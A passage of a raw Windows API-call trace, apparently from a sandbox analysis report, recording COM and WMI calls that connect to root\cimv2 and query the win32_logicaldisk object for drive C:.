[2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0173.614] WbemDefPath:IUnknown:AddRef (This=0x6733f10) returned 0x3 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x7ae440) returned 0x0 [0173.614] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae440, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0173.614] WbemDefPath:IUnknown:Release (This=0x7ae440) returned 0x3 [0173.614] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0173.614] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0173.614] WbemDefPath:IUnknown:Release (This=0x6733f10) returned 0x2 [0173.614] WbemDefPath:IUnknown:Release (This=0x6733f10) returned 0x1 [0173.614] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0173.614] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0173.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x6733f10) returned 0x0 [0173.615] WbemDefPath:IUnknown:AddRef (This=0x6733f10) returned 0x3 [0173.615] WbemDefPath:IUnknown:Release (This=0x6733f10) returned 0x2 [0173.615] WbemDefPath:IWbemPath:SetText (This=0x6733f10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0173.615] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0174.653] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f10, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0175.176] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0175.176] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0175.176] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.176] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0175.176] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0175.177] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0175.177] IUnknown:Release (This=0x72015c) returned 0x1 [0175.177] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x6736fb8) returned 0x0 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0175.178] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736fb8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6734060) returned 0x0 [0175.178] WbemDefPath:IUnknown:Release (This=0x6736fb8) returned 0x0 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6734060) returned 0x0 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0175.178] WbemDefPath:IUnknown:AddRef (This=0x6734060) returned 0x3 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x765028) returned 0x0 [0175.178] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765028, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.178] WbemDefPath:IUnknown:Release (This=0x765028) returned 0x3 [0175.178] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0175.178] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0175.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0175.178] WbemDefPath:IUnknown:Release (This=0x6734060) returned 0x2 [0175.179] WbemDefPath:IUnknown:Release (This=0x6734060) returned 0x1 [0175.179] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0175.179] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0175.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734060, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6734060) returned 0x0 [0175.179] WbemDefPath:IUnknown:AddRef (This=0x6734060) returned 0x3 [0175.179] WbemDefPath:IUnknown:Release (This=0x6734060) returned 0x2 [0175.179] WbemDefPath:IWbemPath:SetText (This=0x6734060, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0175.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734060, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0175.179] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0175.179] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.179] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0175.179] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0175.179] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0175.179] IUnknown:Release (This=0x72015c) returned 0x1 [0175.180] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x673d270) returned 0x0 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x673d270, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0175.180] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d270, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x67373d0) returned 0x0 [0175.180] WbemLocator:IUnknown:Release (This=0x673d270) returned 0x0 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x67373d0) returned 0x0 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0175.180] WbemLocator:IUnknown:AddRef (This=0x67373d0) returned 0x3 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0175.180] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0175.180] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0175.180] WbemLocator:IUnknown:Release (This=0x67373d0) returned 0x2 [0175.180] WbemLocator:IUnknown:Release (This=0x67373d0) returned 0x1 [0175.180] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0175.180] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0175.180] WbemLocator:IUnknown:QueryInterface (in: This=0x67373d0, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x67373d0) returned 0x0 [0175.180] WbemLocator:IUnknown:AddRef (This=0x67373d0) returned 0x3 [0175.180] WbemLocator:IUnknown:Release (This=0x67373d0) returned 0x2 [0175.180] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734060, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0175.181] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0175.181] WbemDefPath:IWbemPath:GetText (in: This=0x6734060, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.181] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x67373a0) returned 0x0 [0175.181] WbemLocator:IWbemLocator:ConnectServer (in: This=0x67373a0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x6748054) returned 0x0 [0178.970] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x782174) returned 0x0 [0178.971] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x782174, pProxy=0x6748054, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0178.971] WbemLocator:IUnknown:Release (This=0x782174) returned 0x1 [0178.971] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x782194) returned 0x0 [0178.971] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x782174) returned 0x0 [0178.971] WbemLocator:IClientSecurity:SetBlanket (This=0x782174, pProxy=0x6748054, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0179.166] WbemLocator:IUnknown:Release (This=0x782174) returned 0x2 [0179.167] WbemLocator:IUnknown:Release (This=0x782194) returned 0x1 [0179.167] CoTaskMemFree (pv=0x77e118) [0179.167] WbemLocator:IUnknown:Release (This=0x67373a0) returned 0x0 [0179.167] WbemLocator:IUnknown:QueryInterface (in: This=0x6748054, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x782194) returned 0x0 [0179.167] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0179.230] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0179.231] WbemLocator:IUnknown:AddRef (This=0x782194) returned 0x3 [0179.232] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0179.232] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0179.232] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x7820f4) returned 0x0 [0179.233] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7820f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.233] WbemLocator:IUnknown:Release (This=0x7820f4) returned 0x3 [0179.233] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0179.233] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0179.233] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x78217c) returned 0x0 [0179.233] WbemLocator:IRpcOptions:Query (in: This=0x78217c, pPrx=0x782194, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0179.234] WbemLocator:IUnknown:Release (This=0x78217c) returned 0x3 [0179.234] WbemLocator:IUnknown:Release (This=0x782194) returned 0x2 [0179.234] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0179.234] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0179.234] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x6748054) returned 0x0 [0179.234] WbemLocator:IUnknown:AddRef (This=0x6748054) returned 0x4 [0179.234] WbemLocator:IUnknown:Release (This=0x6748054) returned 0x3 [0179.234] WbemLocator:IUnknown:Release (This=0x6748054) returned 0x2 [0179.235] SysStringLen (param_1=0x0) returned 0x0 [0179.235] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f10, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0179.235] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0179.235] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.235] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0179.235] WbemLocator:IUnknown:AddRef (This=0x782194) returned 0x3 [0179.235] WbemLocator:IUnknown:QueryInterface (in: This=0x782194, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x782194) returned 0x0 [0179.236] WbemLocator:IUnknown:Release (This=0x782194) returned 0x3 [0179.236] WbemLocator:IUnknown:Release (This=0x782194) returned 0x2 [0179.236] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0179.236] WbemDefPath:IWbemPath:GetText (in: This=0x6733f10, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.236] IWbemServices:GetObject (in: This=0x6748054, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, 